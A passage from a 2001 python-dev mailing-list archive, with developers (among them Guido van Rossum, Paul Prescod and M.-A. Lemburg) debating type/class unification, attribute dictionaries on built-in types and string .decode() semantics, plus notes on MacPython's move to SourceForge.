PythonLabs at Digital Creations From paulp at ActiveState.com Thu May 10 23:55:36 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Thu, 10 May 2001 14:55:36 -0700 Subject: [Python-Dev] Type/class Message-ID: <3AFB0E58.1F0ABCA6@ActiveState.com> -------- Original Message -------- Log Message: Make attributes of subtypes writable, but only for dynamic subtypes derived in Python using a class statement; static subtypes derived in C still have read-only attributes. -------- Original Message -------- I would like to argue that "plain old C types" should act as if they have __dict__s for consistency with other types. It is sometimes useful to be able to annotate objects by adding attributes to them. But this only works with class instance objects, not instances of types. Paul Prescod From jeremy at digicool.com Thu May 10 23:59:34 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Thu, 10 May 2001 17:59:34 -0400 (EDT) Subject: [Python-Dev] Type/class In-Reply-To: <3AFB0E58.1F0ABCA6@ActiveState.com> References: <3AFB0E58.1F0ABCA6@ActiveState.com> Message-ID: <15099.3910.648127.25900@slothrop.digicool.com> >>>>> "PP" == Paul Prescod writes: PP> I would like to argue that "plain old C types" should act as if PP> they have __dict__s for consistency with other types. It is PP> sometimes useful to be able to annotate objects by adding PP> attributes to them. But this only works with class instance PP> objects, not instances of types. Every type should have an __dict__ of type dict? Then every dict must have an __dict__, including the __dict__ of __dict__? Once every object has an __dict__, every object will be mutable. Then no object will be usable as a dict key and we can get rid of dict's entirely. 
Jeremy

From fdrake at cj42289-a.reston1.va.home.com Fri May 11 00:47:14 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Thu, 10 May 2001 18:47:14 -0400 (EDT)
Subject: [Python-Dev] [maintenance doc updates]
Message-ID: <20010510224714.15E4328946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

    http://python.sourceforge.net/maint-docs/

Incremental update for the maintenance version docs.

From fdrake at cj42289-a.reston1.va.home.com Fri May 11 01:04:40 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Thu, 10 May 2001 19:04:40 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010510230440.30DB228946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

    http://python.sourceforge.net/devel-docs/

Incremental update for the development version of the docs.

From guido at digicool.com Fri May 11 02:03:13 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 19:03:13 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Thu, 10 May 2001 14:55:36 MST." <3AFB0E58.1F0ABCA6@ActiveState.com>
References: <3AFB0E58.1F0ABCA6@ActiveState.com>
Message-ID: <200105110003.TAA02924@cj20424-a.reston1.va.home.com>

Glad somebody is watching what I'm doing here -- I was afraid I was having too much fun by myself! :-)

> -------- Original Message --------
> Log Message:
>
> Make attributes of subtypes writable, but only for dynamic subtypes
> derived in Python using a class statement; static subtypes derived in
> C still have read-only attributes.
> -------- Original Message --------
>
> I would like to argue that "plain old C types" should act as if they
> have __dict__s for consistency with other types.

Good point. Plain old types currently (in the descr-branch) have a readonly dict (using a proxy) and no settable attributes.
I will probably give types settable attributes in a next revision, but I prefer not to make the type's dict writable -- I need to be able to watch the setattr calls so that if someone changes DictType.__getitem__ I can change the mp_subscript to a C function that calls the __getitem__ method. For speed reasons, if you don't override them, the C tp_slot functions carry out the operation directly, and the __slot__ methods call the C tp_slot functions; but when __slot__ is overridden, tp_slot must call __slot__.

> It is sometimes useful
> to be able to annotate objects by adding attributes to them. But this
> only works with class instance objects, not instances of types.
>
> Paul Prescod

If you're talking about *instances*: instances of subtypes of built-in types have a dict of their own to which you can add stuff to your heart's content. Instances of built-in types will continue not to have a dict (it would cost too much space if *every* object had a dict, even if it was a NULL pointer when no attrs are defined).

If you mean you want to annotate types like you can annotate classes, that should be possible once I implement what I describe above.

--Guido van Rossum (home page: http://www.python.org/~guido/)

From paulp at ActiveState.com Fri May 11 01:22:16 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Thu, 10 May 2001 16:22:16 -0700
Subject: [Python-Dev] Type/class
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <15099.3910.648127.25900@slothrop.digicool.com>
Message-ID: <3AFB22A8.A0A6A4D4@ActiveState.com>

Jeremy Hylton wrote:
>
> >>>>> "PP" == Paul Prescod writes:
>
> PP> I would like to argue that "plain old C types" should act as if
> PP> they have __dict__s for consistency with other types. It is
> PP> sometimes useful to be able to annotate objects by adding
> PP> attributes to them. But this only works with class instance
> PP> objects, not instances of types.
>
> Every type should have an __dict__ of type dict?
> Then every dict
> must have an __dict__, including the __dict__ of __dict__?

What's wrong with that? Every object has a type, even type objects, and type types. It only becomes a problem if you try to recursively walk all the dictionaries in the system adding information to them. Otherwise they have null pointers that "act as if" they were empty dictionaries.

> Once every object has an __dict__, every object will be mutable. Then
> no object will be usable as a dict key and we can get rid of dict's
> entirely.

According to that argument, instances cannot be dictionary keys. That is simply not true. Objects do not implement their hash functions in terms of ALL of their attributes!

-- 
Take a recipe. Leave a recipe.
Python Cookbook! http://www.ActiveState.com/pythoncookbook

From mwh at python.net Fri May 11 01:31:53 2001
From: mwh at python.net (Michael Hudson)
Date: Fri, 11 May 2001 00:31:53 +0100 (BST)
Subject: [Python-Dev] python-dev summary 2001-04-26 - 2001-05-10
Message-ID:

This is a summary of traffic on the python-dev mailing list between Apr 26 and May 9 (inclusive) 2001. It is intended to inform the wider Python community of ongoing developments. To comment, just post to python-list at python.org or comp.lang.python in the usual way. Give your posting a meaningful subject line, and if it's about a PEP, include the PEP number (e.g. Subject: PEP 201 - Lockstep iteration)

All python-dev members are interested in seeing ideas discussed by the community, so don't hesitate to take a stance on a PEP if you have an opinion.

This is the seventh summary written by Michael Hudson.
Summaries are archived at:

Posting distribution (with apologies to mbm)

Number of articles in summary: 228

[Bar chart of articles per day; counts recovered from the chart's axis:]

    Thu 26 Apr    7
    Fri 27 Apr   24
    Sat 28 Apr   10
    Sun 29 Apr    1
    Mon 30 Apr   10
    Tue 01 May   10
    Wed 02 May   44
    Thu 03 May   23
    Fri 04 May   19
    Sat 05 May   10
    Sun 06 May    2
    Mon 07 May   12
    Tue 08 May   17
    Wed 09 May   39

A fairly quiet, but interesting fortnight (and I don't mean the sarcastic replies to the Homepage virus). A few build problems and bugs fixed, and one very involved discussion (cf. most of the rest of this summary).

* type == class? *

Guido posted a message from Jim Althoff describing the metaclass system used in Smalltalk:

He also mentioned a problem that is bound to bite any attempt to heal the type/class split in Python. If there are to be no special cases in the type system then classes and types in particular should be instances. This sounds innocuous, but consider:

    class MyDictType(DictType):
        def __repr__(self):
            return "MyDictType(%s)" % DictType.__repr__(self)

The code is hoping that, as in today's Python, DictType.__repr__ will return an unbound method - the __repr__ method of vanilla dictionaries, so that output of the form MyDictType({1:2}) will be given. But DictType is now an instance, so there's another interpretation for DictType.__repr__ - the bound DictType's own __repr__ method!

This is a fundamental problem; currently "class.attr" and "instance.attr" have different meanings in Python, and any attempt to conflate the notions of "class" and "instance" is bound to run aground.
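For comparison, a sketch of the MyDictType example in today's Python 3, which is not something proposed in this thread: dict plays the role of DictType, and the superclass call uses the built-in super(), added in Python 2.2 and given its zero-argument form in Python 3. Looking up __repr__ on dict still yields the method meant for dict instances, while the class object's own repr comes from its metaclass, type(dict).

```python
class MyDictType(dict):
    """A dict subclass whose repr names the subclass."""

    def __repr__(self):
        # super() continues the method lookup in the MRO after MyDictType
        # and finds dict.__repr__; no unbound-method lookup is needed.
        return "MyDictType(%s)" % super().__repr__()


d = MyDictType({1: 2})
print(repr(d))                     # MyDictType({1: 2})

# The older explicit spelling still works: attribute lookup on the class
# finds the method meant for dict instances ...
print(dict.__repr__(d))            # {1: 2}
# ... while the repr of the class object itself comes from its metaclass.
print(type(dict).__repr__(dict))   # <class 'dict'>
```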
Guido proposed some hairy disambiguation rules in the above-linked message, but no-one was particularly enthused about them, possibly because no-one could really get their head round them.

The long-term solution is to change the syntax for getting - or removing entirely - unbound methods. As far as anyone can make out, all that unbound methods are used for is calling superclasses' methods from overriding methods, so if one can find another way of spelling that, then removing unbound methods entirely could be contemplated.

So the discussion on that went around for a bit, with no really new compelling ideas surfacing. There was some support for some kind of souped-up super.foo() construct:

To me, the most plausible ideas came from Thomas Heller:

and from Paul Dubois, who suggested nicking the feature renaming feature from Eiffel:

though the best syntax for the latter is far from clear.

There's also the king-sized issue of backwards compatibility; to a first degree of approximation, *all* Python code that uses inheritance would need to be updated to accommodate changes in the meaning of "class.attribute". Another __future__ statement, maybe?

* data.decode *

Marc-Andre Lemburg asked if it might be an idea if string objects sprouted an .decode method:

After some umming and arring and accusations of bloat, this got BDFL approval, and should appear in CVS imminently.

* Moving MacPython to sourceforge *

Jack Jansen posted notice that he intends to move the MacPython code over to sourceforge:

It will be nice to finally have all the code in the same place!

Cheers,
M.

From paulp at ActiveState.com Fri May 11 02:26:43 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Thu, 10 May 2001 17:26:43 -0700
Subject: [Python-Dev] Type/class
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com>
Message-ID: <3AFB31C3.5CEF9064@ActiveState.com>

Guido van Rossum wrote:
>
>...
>
> Good point.
> Plain old types currently (in the descr-branch) have a
> readonly dict (using a proxy) and no settable attributes. I will
> probably give types settable attributes in a next revision, but I
> prefer not to make the type's dict writable -- I need to be able to
> watch the setattr calls so that if someone changes
> DictType.__getitem__ I can change the mp_subscript to a C function
> that calls the __getitem__ method.

I'm happy to have you look and see if I'm setting something magical. But if I'm not, I would like you to just add the thing I made to an internal private dictionary and remember it. I think that's what you are talking about.

>...
> If you're talking about *instances*: instances of subtypes of built-in
> types have a dict of their own to which you can add stuff to your
> heart's content. Instances of built-in types will continue not to
> have a dict (it would cost too much space if *every* object had a
> dict, even if it was a NULL pointer when no attrs are defined).

Darn. That *is* what I was hoping for.

There is an implementation that is slowish if you use it, but has little cost if you don't: keep a big dict mapping object pointers to their associated dictionaries (if any). For purposes of discussion, call it sys._associations. Then have the getattr on "PyObject" look in this dict of dicts for attributes that it can't otherwise find, and setattr construct dictionaries in the dict of dicts if necessary.

That's the usual workaround anyhow, so this would be a nicer syntax and a more orthogonal model.

Price: a hasattr that would return false or getattr that would raise AttributeError would be a little slower. They would have to check the dictionary of dictionaries before deciding that they really don't have the attribute.

-- 
Take a recipe. Leave a recipe.
Python Cookbook!
http://www.ActiveState.com/pythoncookbook

From guido at digicool.com Fri May 11 03:57:36 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 20:57:36 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Thu, 10 May 2001 17:26:43 MST." <3AFB31C3.5CEF9064@ActiveState.com>
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com> <3AFB31C3.5CEF9064@ActiveState.com>
Message-ID: <200105110157.UAA03123@cj20424-a.reston1.va.home.com>

> > Good point. Plain old types currently (in the descr-branch) have a
> > readonly dict (using a proxy) and no settable attributes. I will
> > probably give types settable attributes in a next revision, but I
> > prefer not to make the type's dict writable -- I need to be able to
> > watch the setattr calls so that if someone changes
> > DictType.__getitem__ I can change the mp_subscript to a C function
> > that calls the __getitem__ method.
>
> I'm happy to have you look and see if I'm setting something magical. But
> if I'm not, I would like you to just add the thing I made to an internal
> private dictionary and remember it. I think that's what you are talking
> about.

OK, we agree on this one.

> >...
> > If you're talking about *instances*: instances of subtypes of built-in
> > types have a dict of their own to which you can add stuff to your
> > heart's content. Instances of built-in types will continue not to
> > have a dict (it would cost too much space if *every* object had a
> > dict, even if it was a NULL pointer when no attrs are defined).
>
> Darn. That *is* what I was hoping for.
>
> There is an implementation that is slowish if you use it, but has little
> cost if you don't: keep a big dict mapping object pointers to their
> associated dictionaries (if any). For purposes of discussion, call it
> sys._associations.
> Then have the getattr on "PyObject" look in this dict
> of dicts for attributes that it can't otherwise find, and setattr
> construct dictionaries in the dict of dicts if necessary.
>
> That's the usual workaround anyhow so this would be a nicer syntax and a
> more orthogonal model.
>
> Price: a hasattr that would return false or getattr that would raise
> AttributeError would be a little slower. They would have to check the
> dictionary of dictionaries before deciding that they really don't have
> the attribute.

Personally, if you want this outrageous implementation, you should be paying for it, not the infrastructure. It feels contrary to Python's treatment of objects. I don't like elaborate workarounds in the implementation like this -- probably because the performance model becomes muddy.

--Guido van Rossum (home page: http://www.python.org/~guido/)

From greg at cosc.canterbury.ac.nz Fri May 11 03:05:11 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 11 May 2001 13:05:11 +1200 (NZST)
Subject: [Python-Dev] Type/class
In-Reply-To: <3AFB22A8.A0A6A4D4@ActiveState.com>
Message-ID: <200105110105.NAA17698@s454.cosc.canterbury.ac.nz>

Paul Prescod :
> Otherwise
> they have null pointers that "act as if" they were empty
> dictionaries.

Actually, they need to act as if they were empty except for a "__dict__" slot which contains another one of these magic things. :-)

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,          | A citizen of NewZealandCorp, a       |
Christchurch, New Zealand          | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz      +--------------------------------------+

From barry at digicool.com Fri May 11 05:45:38 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Thu, 10 May 2001 23:45:38 -0400
Subject: [Python-Dev] Interview with Mark Lutz
Message-ID: <15099.24674.311472.184935@anthem.wooz.org>

Great interview with Mark on the ORA site, linked from /.
http://python.oreilly.com/news/python_0501.html

-Barry

From fredrik at effbot.org Fri May 11 07:57:34 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Fri, 11 May 2001 07:57:34 +0200
Subject: [Python-Dev] Interview with Mark Lutz
References: <15099.24674.311472.184935@anthem.wooz.org>
Message-ID: <022d01c0d9eb$d3e3d680$e46940d5@hagrid>

barry wrote:

> Great interview with Mark on the ORA site, linked from /.
>
> http://python.oreilly.com/news/python_0501.html

you mean that python-devers read slashdot for python news, when you have the daily url:

    http://www.pythonware.com/daily

Cheers /F

From thomas at xs4all.net Fri May 11 11:02:26 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Fri, 11 May 2001 11:02:26 +0200
Subject: [Python-Dev] Re: test_mmap failing?
In-Reply-To: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>; from fdrake@acm.org on Thu, May 10, 2001 at 10:57:59AM -0400
References: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>
Message-ID: <20010511110226.M16486@xs4all.nl>

On Thu, May 10, 2001 at 10:57:59AM -0400, Fred L. Drake, Jr. wrote:

[ Fred violates Tim's Rule #1 (don't ever use 'foo' for anything) and gets bitten in the derriere ]

> This begs the question, though -- should tests that create temp
> files check that the files don't already exist, and fail with a more
> descriptive error if they do?

I'd think so, yes. I'd also suggest nothing uses something as lamenamed as 'foo', 'test' or 'spam' -- I'm sure Tim will agree with me, at least on the first account :) How about mmap calls its test-testfile 'test_mmap.foo' ?

-- 
Thomas Wouters

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!

From mal at lemburg.com Fri May 11 11:34:25 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 11 May 2001 11:34:25 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com>
Message-ID: <3AFBB221.F29BCB9A@lemburg.com>

Michael Hudson wrote:
>
> "M.-A. Lemburg" writes:
>
> > I've attached the patch. Due to a small reorganisation the patch is
> > a little longer -- symmetry has its price at C level too ;-)
>
> I may be being dense, but can you explain what's going on here:
>
> ->> u'\u00e3'.encode('latin-1')
> '\xe3'
> ->> u'\u00e3'.encode("latin-1").decode("latin-1")
> Traceback (most recent call last):
>   File "", line 1, in ?
> UnicodeError: ASCII encoding error: ordinal not in range(128)

The string.decode() method will try to reuse the Unicode codecs here. To do this, it will have to convert the string to Unicode first and this fails due to the character not being in the ASCII range.

> Can you come up with some other example I can use it tomorrow's
> python-dev summary?

I will add some codecs which make the .decode() method useful next week. The ones I have in mind are base64, hex and some of the other binascii codecs. Also, the ROT13 codec I posted will go into the core as simple example.

With those you will be able to write:

    data.encode('base64').decode('base64')

and get back data.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting: http://www.egenix.com/
Python Software: http://www.lemburg.com/python/

From fredrik at effbot.org Fri May 11 11:43:14 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Fri, 11 May 2001 11:43:14 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AFBB221.F29BCB9A@lemburg.com>
Message-ID: <049801c0d9fe$cd98aef0$e46940d5@hagrid>

mal wrote:
> > I may be being dense, but can you explain what's going on here:
> >
> > ->> u'\u00e3'.encode('latin-1')
> > '\xe3'
> > ->> u'\u00e3'.encode("latin-1").decode("latin-1")
> > Traceback (most recent call last):
> >   File "", line 1, in ?
> > UnicodeError: ASCII encoding error: ordinal not in range(128)
>
> The string.decode() method will try to reuse the Unicode
> codecs here. To do this, it will have to convert the string
> to Unicode first and this fails due to the character not being
> in the ASCII range.

can you take that again? shouldn't michael's example be equivalent to:

    unicode(u"\u00e3".encode("latin-1"), "latin-1")

if not, I'd argue that your "decode" design is broken, instead of just buggy...

Cheers /F

From mal at lemburg.com Fri May 11 11:50:24 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 11 May 2001 11:50:24 +0200
Subject: [Python-Dev] Interview with Mark Lutz
References: <15099.24674.311472.184935@anthem.wooz.org> <022d01c0d9eb$d3e3d680$e46940d5@hagrid>
Message-ID: <3AFBB5E0.620710C8@lemburg.com>

Fredrik Lundh wrote:
>
> barry wrote:
>
> > Great interview with Mark on the ORA site, linked from /.
> >
> > http://python.oreilly.com/news/python_0501.html
>
> you mean that python-devers read slashdot for python news,
> when you have the daily url:
>
> http://www.pythonware.com/daily

I just bought one of those nice machines that can run pippy and was wondering how to get AvantGo (the channel software that comes with it) to synchronize with your daily URL... wouldn't it be possible to setup a channel for this ?
The AvantGo channels can be registered at their site (http://www.avantgo.com), but the contents would have to be "mobile friendly"... anyway, just a thought ;-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting: http://www.egenix.com/
Python Software: http://www.lemburg.com/python/

From mal at lemburg.com Fri May 11 12:07:40 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 11 May 2001 12:07:40 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid>
Message-ID: <3AFBB9EC.F75C158D@lemburg.com>

Fredrik Lundh wrote:
>
> mal wrote:
>
> > > I may be being dense, but can you explain what's going on here:
> > >
> > > ->> u'\u00e3'.encode('latin-1')
> > > '\xe3'
> > > ->> u'\u00e3'.encode("latin-1").decode("latin-1")
> > > Traceback (most recent call last):
> > >   File "", line 1, in ?
> > > UnicodeError: ASCII encoding error: ordinal not in range(128)
> >
> > The string.decode() method will try to reuse the Unicode
> > codecs here. To do this, it will have to convert the string
> > to Unicode first and this fails due to the character not being
> > in the ASCII range.
>
> can you take that again? shouldn't michael's example be
> equivalent to:
>
> unicode(u"\u00e3".encode("latin-1"), "latin-1")
>
> if not, I'd argue that your "decode" design is broken, instead
> of just buggy...

Well, it is sort of broken, I agree. The reason is that PyString_Encode() and PyString_Decode() guarantee the returned object to be a string object. To be able to reuse Unicode codecs I added code which converts Unicode back to a string in case the codec returns a Unicode object (which the .decode() method does). This is what's failing.
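For readers coming to this thread from Python 3, a sketch of how these cases behave there; this is the later design, not the patch under discussion. str.encode always yields bytes and bytes.decode always yields str, so Michael's round trip succeeds, while bytes-to-bytes and str-to-str transforms such as base64 and rot13 are reached through codecs.encode() and codecs.decode() rather than through the methods.

```python
import codecs

# Michael's round trip: text -> bytes -> text with the same codec.
raw = "\u00e3".encode("latin-1")
print(raw)                                  # b'\xe3'
print(raw.decode("latin-1") == "\u00e3")    # True

# MAL's data.encode('base64').decode('base64') becomes a pair of codecs
# calls; the base64 codec maps bytes to bytes and appends a newline.
packed = codecs.encode(b"data", "base64")
print(packed)                               # b'ZGF0YQ==\n'
print(codecs.decode(packed, "base64"))      # b'data'

# rot13 is a str-to-str transform, so str.encode() refuses it.
print(codecs.encode("hello", "rot13"))      # uryyb
try:
    "hello".encode("rot13")
except LookupError as exc:
    print("str.encode refused:", exc)
```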
Perhaps I should simply remove the restriction and have both APIs return the codec's return object as-is ?! (I would be in favour of this, but I'm not sure whether this is already in use by someone...)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting: http://www.egenix.com/
Python Software: http://www.lemburg.com/python/

From guido at digicool.com Fri May 11 15:31:18 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 08:31:18 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Thu, 10 May 2001 20:57:36 EST." <200105110157.UAA03123@cj20424-a.reston1.va.home.com>
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com> <3AFB31C3.5CEF9064@ActiveState.com> <200105110157.UAA03123@cj20424-a.reston1.va.home.com>
Message-ID: <200105111331.IAA04171@cj20424-a.reston1.va.home.com>

> > > Good point. Plain old types currently (in the descr-branch) have a
> > > readonly dict (using a proxy) and no settable attributes. I will
> > > probably give types settable attributes in a next revision, but I
> > > prefer not to make the type's dict writable -- I need to be able to
> > > watch the setattr calls so that if someone changes
> > > DictType.__getitem__ I can change the mp_subscript to a C function
> > > that calls the __getitem__ method.

Alas, I think I'll have to withdraw this promise for now. The truly built-in types are static objects that are shared between all interpreter instances within one process, and each type has only one dictionary pointer. So changes to the __dict__ would affect other interpreter instances, and that's unacceptable. I've thought about alternatives; I can't give each interpreter its own set of types because sometimes objects are shared between interpreters (e.g. the dictionary of interned strings), and then their types have to be shared too!
Not having any object sharing would mean too much of a change to the foundations of the implementation. I think we'll have to live with this restriction until Python 3000. Personally, I don't mind -- I see mostly possible abuses for the ability to change attributes of e.g. DictType or StringType. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)

From sdm7g at Virginia.EDU Fri May 11 15:43:32 2001
From: sdm7g at Virginia.EDU (Steven D. Majewski)
Date: Fri, 11 May 2001 09:43:32 -0400 (EDT)
Subject: [Python-Dev] Type/class
In-Reply-To: <200105111331.IAA04171@cj20424-a.reston1.va.home.com>
Message-ID:

Catching up on this thread -- mostly because it looks like I'm going to have to use ExtensionClass to make pyobjc classes into python classes rather than types -- you can add that to the list of real world uses of Don's Metaclass hack that Tim questioned.

Reading up on MetaClasses in Smalltalk again makes me appreciate the simplicity of a prototype system where everything is just an object -- all objects can be cloned, and some objects are only used for cloning -- they are the exemplars of their type which fill the role of Classes.

Unfortunately, although prototypes would be a lot simpler, it would be a pretty incompatible change for Python -- I can't think of any way to get there without a lot of breakage. (Still -- I wonder if there's a way they could be used under the covers in the implementation to make it simpler. Prototype semantics are basically a superset of Class based semantics, which is how it was easy to do Smalltalk in Self.)

Classes are necessary for statically typed O-O languages, but IMHO, make a lot less sense for dynamic languages. If Py3K were to be a clean start, I'd urge basing it on prototypes, but as an incremental creation -- I don't know how to get there from here (unless it could sneak in under the implementation covers!)
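To make Steve's description concrete, a minimal sketch of Self-style prototypes in Python 3; it is illustrative only and not something proposed for Python, and the names Proto and clone are hypothetical. Each object keeps its own slots plus a parent link, a failed lookup is delegated up the chain, and functions found there are bound to the original receiver, which is what lets a clone reuse its prototype's methods.

```python
import types


class Proto:
    """A tiny prototype-based object: no classes, just delegation."""

    def __init__(self, parent=None, **slots):
        # Bypass our own __setattr__ for the two bookkeeping attributes.
        self.__dict__["_parent"] = parent
        self.__dict__["_slots"] = dict(slots)

    def __getattr__(self, name):
        # Called only when normal lookup fails, i.e. for every slot name:
        # search this object, then its parent, grandparent, and so on.
        obj = self
        while obj is not None:
            slots = obj.__dict__["_slots"]
            if name in slots:
                value = slots[name]
                # Bind functions to the receiver, not to the object that
                # happens to hold them, so "self" inside is the clone.
                if isinstance(value, types.FunctionType):
                    return types.MethodType(value, self)
                return value
            obj = obj.__dict__["_parent"]
        raise AttributeError(name)

    def __setattr__(self, name, value):
        # Assignment always creates or updates a slot on this object only.
        self.__dict__["_slots"][name] = value

    def clone(self, **slots):
        """Return a new object whose lookups fall back to self."""
        return Proto(self, **slots)


point = Proto(x=0, y=0, describe=lambda self: "(%d, %d)" % (self.x, self.y))
p = point.clone(x=3)
print(p.describe())      # (3, 0)
p.y = 4
print(p.describe())      # (3, 4)
print(point.describe())  # (0, 0)
```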
BTW: XlispStat, which has a prototype object system with multiple inheritance, also doesn't have "super" -- there is a (call-next-method [ args... ]) function/macro which searches for the base classes. I'm sure there's a lower level function to just get the next method, but typically, call-next-method is what's used. There is no search for non-method attributes, as all of the base class instance vars are merged and made into slots of the instance itself. (There's no class variables -- there's no classes.) The closest python equivalent would be, as has been discussed in this thread, a super method or function that does attribute lookup on the bases.

-- Steve Majewski

From nas at python.ca Fri May 11 16:06:39 2001
From: nas at python.ca (Neil Schemenauer)
Date: Fri, 11 May 2001 07:06:39 -0700
Subject: [Python-Dev] Re: Change module attribute get & set
In-Reply-To: ; from noreply@sourceforge.net on Fri, May 11, 2001 at 06:35:28AM -0700
References:
Message-ID: <20010511070639.A1402@glacier.fnational.com>

noreply at sourceforge.net wrote:
> Module objects currently don't define the tp_getattro
> or tp_setattro slots. As a result, interning of
> attribute names does them no good: a char* is always
> passed, so the dict lookup always needs to do a string
> compare despite that the attribute name is interned.

I think this is a problem in classobject.c:generic_binary_op as well. PyObject_GetAttrString is always used. I believe the old code interned names like "__add__" and used PyObject_GetAttr. Is it worth fixing this?

Neil

From guido at digicool.com Fri May 11 17:13:56 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 10:13:56 -0500
Subject: [Python-Dev] Re: Change module attribute get & set
In-Reply-To: Your message of "Fri, 11 May 2001 07:06:39 MST."
<20010511070639.A1402@glacier.fnational.com>
References: <20010511070639.A1402@glacier.fnational.com>
Message-ID: <200105111513.KAA04872@cj20424-a.reston1.va.home.com>

> I think this is a problem in classobject.c:generic_binary_op as
> well. PyObject_GetAttrString is always used. I believe the old
> code interned names like "__add__" and used PyObject_GetAttr. Is
> it worth fixing this?

Maybe. I'd give this low priority. If my descriptor branch work goes well, most of classobject.c *may* disappear in favor of the newly swollen typeobject.c. ;-)

--Guido van Rossum (home page: http://www.python.org/~guido/)

From jack at oratrix.nl Fri May 11 16:29:24 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Fri, 11 May 2001 16:29:24 +0200
Subject: [Python-Dev] Mac CVS repository moved to sourceforge
Message-ID: <20010511142924.C8037303181@snelboot.oratrix.nl>

Folks, the Python/Mac repository has been moved to sourceforge, and is integrated with the general Python repository, so from now on a single CVS tree suffices to build MacPython.

I'm setting the old pythoncvs.oratrix.nl repository to readonly for a few more weeks and then it'll disappear.

Note that the pythoncvs.oratrix.nl repository is still the source for some of the optional libraries you need to build MacPython, but that's only if you want to build it completely from CVS.

-- 
Jack Jansen                | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack       | ++++ see http://www.xs4all.nl/~tank/ ++++

From martin at loewis.home.cs.tu-berlin.de Fri May 11 16:41:33 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Fri, 11 May 2001 16:41:33 +0200
Subject: [Python-Dev] Mac hierarchy backwards
Message-ID: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de>

First, thanks to Jack Jansen for integrating the Mac sources; this is a good thing.
It seems, however, that some of the directory structure is backwards: Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There may be others of this kind. I also wonder whether all these files are still needed, and meant to be distributed. E.g. I see chdir.c having the comment /* Chdir for the Macintosh. Public domain by Guido van Rossum, CWI, Amsterdam (July 1987). Pathnames must be Macintosh paths, with colons as separators. */ Is it really the case that the Mac API hasn't grown a chdir call in 13 years? Regards, Martin From fdrake at acm.org Fri May 11 16:55:33 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Fri, 11 May 2001 10:55:33 -0400 (EDT) Subject: [Python-Dev] Mac hierarchy backwards In-Reply-To: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> References: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> Message-ID: <15099.64869.626588.775895@cj42289-a.reston1.va.home.com> Martin v. Loewis writes: > It seems, however, that some of the directory structure is backwards: > Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There > may be others of this kind. I agree that this should be the goal; I don't know if Jack's release procedure would need to be revised before that can happen. If so, I'd encourage him to do so. > Is it really the case that the Mac API hasn't grown a chdir call in 13 > years? Yikes! I just searched developer.apple.com for "chdir" and came up with no hits, but I really don't know just what that tells me. chdir() is required for POSIX compliance, but it isn't mentioned in the C9X final committee draft. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From jack at 